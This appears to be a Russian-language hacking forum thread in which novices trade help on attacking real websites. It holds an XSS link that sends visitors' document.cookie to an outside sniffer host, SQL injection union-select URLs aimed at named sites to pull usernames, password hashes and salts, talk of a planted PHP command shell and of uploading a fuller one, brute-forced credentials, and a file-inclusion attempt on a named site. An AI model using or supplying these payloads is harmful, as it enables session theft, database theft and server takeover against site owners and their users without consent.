вообщем, xss выполняется, но " и ' фильтруются, то есть перед ними ставится /. Но перевожу скрипт в форму hex, то скрипт не выполняется, тоесть он просто выводит его на странице. Может это из-за браузера? Без примера, тк не хочу расппространятся.
установил снифер на нэтсек.ру...как сделать, чтобы через ссылку печеньки на него шли?и вобще это возможно?напишите примерный вид ссылки
-slow-, Сначала найди xss'ку на нужном тебе сайте А потом ссылка вида: www.site.ru/index.php?id=<script>img=new Image();img.src="http://www.s.netsec.ru/pic.gif?"+document.cookie;</script>
ребя та, есть шелл на сайте такого вида: <? system($_get[cmd]) ?> но там лиункс стоит. какой коммандой мне закачать нормальный шелл? права на записть есть
У меня есть пароль, что дальше? Help!!! HELP!!!!!!!! Я добыл брутом пароль.Через Putty почему-то его не могу ввести. Признаюсь я в хаке полнейший ламос. Как не через Putty ввести пароль? Помогите!!!
Народ, очень интересует- можно узнать с помощью лимита имена колонок типа юзер пассворд в базе таблице? Таблицы узнал,а подобрать пассы не могу =((((подобрал только ид и имя юзера))
Причём тут лимит? Лимит всего лишь ограничивает/распределяет вывод данных. Если версия базы ниже пятой (насколько я догадался мускуль), то смотри форму авторизации. Значения name, 80% что совпадут с названием колонок.
http://www.sitecom/showcategory.php?cid=7+union+select+0,column_name,2,3,4+from+site_users.columns+/* Доступа через селект туда нету,к information_schema.tables есть. Просмотрел имена таблиц через лимит,напарываюсь на site_users.Там почти 5к юзеров. Подобрал user_id и username, а пароли никак )(.
Кто тебя учил таким запросам? Купи книгу по sql select column_name from information_schema.columns where table_name = blablabla limit 1,1
http://housefind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2 Эммм...ктонить может объяснить по порядку,как оно сделано о_О ? А то я нириально туплю(первый раз ваапще такое встречаю):Р.Как в таком случае узнать кол.-во строк и таблиц? ) (Можно подробно).Когда я ордер пробую он выдаёт предупреждение )(
Тот вариант тоже прокатывал, ток я почему-то не угадал user_password, ибо к мускулу доступа не было)(
Извените за банальный тупой вопрос по пхп инклюдингу. прочол статью по этой теме на античате вот нашол плохую фильтрацию http://www.dosuga.net/index.php?type=pic&seq=dfdsfds&mk=on&num=4&tot=92 (уязвима переменная seq) пробывал подставить в переменную сайт http://www.dosuga.net/index.php?type=pic&seq=http://www.google.ru&mk=on&num=4&tot=92 ноль эмоций пробывал разработать как локальный инклюд http://www.dosuga.net/index.php?type=pic&seq=../index.php&mk=on&num=4&tot=92 тоже ничего подскажите в чом я ошибся и как разрабатывать эту уязвимость?
